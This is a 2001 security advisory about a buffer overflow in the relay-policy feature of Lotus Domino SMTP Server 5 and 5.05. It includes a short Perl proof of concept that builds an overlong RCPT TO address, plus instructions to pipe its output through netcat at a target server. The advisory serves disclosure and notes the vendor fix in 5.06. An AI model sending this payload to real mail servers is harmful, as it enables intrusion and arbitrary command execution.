Reported January 23, 2001, by S.A.F.E.R.
VERSIONS AFFECTED
- Lotus Domino Notes Server 5 and 5.05
DESCRIPTION
Lotus Domino SMTP Server contains a policy feature that you can use to
prevent email relaying. However, a malicious attacker can use a
vulnerability in this policy feature to overflow the buffer and possibly
launch arbitrary commands.
DEMONSTRATION
S.A.F.E.R.
supplied the following proof-of-concept code:
--
cut --
#!/usr/bin/perl
$req="a"
. "%A"x200 . "A"x600 . "%allowed.domain.com\@allowed.domain.com";
print
"ehlo foo\nmail from: blah\@example.com\nrcpt
to:$req\ndata\nfoo\n.\nquit\n";
--
cut --
Simply
replace “allowed.domain.com” with the domain name running Lotus Notes
SMTP Server, and pipe the output through netcat.
VENDOR RESPONSE
Lotus
was informed of this vulnerability on November 2, 2000, and has fixed this
issue in release 5.06.
CREDIT
Discovered by S.A.F.E.R. |